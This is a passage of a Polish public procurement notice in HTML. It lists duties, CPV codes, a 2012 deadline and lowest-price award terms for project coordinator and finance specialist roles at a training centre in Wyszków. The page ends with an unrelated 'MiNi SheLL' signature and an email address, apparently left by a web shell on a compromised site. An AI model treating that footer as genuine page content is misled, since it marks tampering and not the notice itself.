Wykonywanie zleconych zadań odbywać się będzie w Centrum Kształcenia Praktycznego w Wyszkowie, w godzinach ustalonych z Zamawiającym                                  i dostosowanych do potrzeb Beneficjentów Ostatecznych Projektu.
Zamawiający zapewnia wykonawcy: pomieszczenie biurowe, dostępność podstawowego sprzętu biurowego (m.in. telefon, drukarka), dostęp do Internetu, podstawowe materiały biurowe do druku i korespondencji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KOORDYNATOR(KA)  DS. KURSÓW I SZKOLEŃ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odpowiedzialny(a) za zapewnienie wysokiej jakości programów szkoleniowych, nadzór nad prawidłową realizacją procesu szkoleń, układaniem harmonogramu zajęć, współpracę z wykładowcami i instruktorami, nadzór nad merytorycznym poziomem  programów  kursów(szkoleń), analizę poziomu frekwencji uczestników oraz podejmowanie wraz z kierownikiem(czką) projektu ewentualnych działań prewencyjnych i zaradczych w tym zakresie. 
Ponadto wykonawca zobowiązany jest do realizacji zadań: 
a) przygotowywanie spotkań informacyjnych, 
b) treści materiałów promocyjnych, 
c) odpowiedzialność za ankietyzację oraz przygotowanie materiałów do podsumowania projektu.
Wykonywanie zleconych zadań odbywać się będzie w Centrum Kształcenia Praktycznego w Wyszkowie, w godzinach ustalonych z Zamawiającym i dostosowanych do potrzeb Beneficjentów Ostatecznych Projektu.
W przypadku kolizji świadczeń, świadczenie na rzecz zamawiającego posiada pierwszeństwo przed świadczeniami na rzecz osób trzecich. 
Zamawiający zapewnia wykonawcy: pomieszczenie biurowe, dostępność podstawowego sprzętu biurowego (m.in. telefon, drukarka), dostęp do Internetu, podstawowe materiały biurowe do druku i korespondencji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> SPECJALISTY(STKI) DS. OBSŁUGI FINANSOWEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odpowiedzialny(a) za prawidłowość rozliczeń finansowych, przygotowanie wniosków o płatność, opracowanie dokumentów finansowych, sporządzanie harmonogramów płatności.
Ponadto wykonawca zobowiązany jest do realizacji zadań: 
a) obsługa kadrowo-płacowa oraz ewidencja umów 
b) monitoring postępów realizacji projektu, 
c) prowadzenia sprawozdawczości projektu, 
d) składaniu i wypełniani wniosków o płatność, 
e) obsługa GWP, wnioskowanie o zmiany, 
f) bieżący kontakt z IW (poprawki).
Wykonywanie zleconych zadań odbywać się będzie w Centrum Kształcenia Praktycznego w Wyszkowie, w godzinach ustalonych z Zamawiającym i dostosowanych do potrzeb Beneficjentów Ostatecznych Projektu.
W przypadku kolizji świadczeń, świadczenie na rzecz zamawiającego posiada pierwszeństwo przed świadczeniami na rzecz osób trzecich. 
Zamawiający zapewnia wykonawcy: pomieszczenie biurowe, dostępność podstawowego sprzętu biurowego (m.in. telefon, drukarka), dostęp do Internetu, podstawowe materiały biurowe do druku i korespondencji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com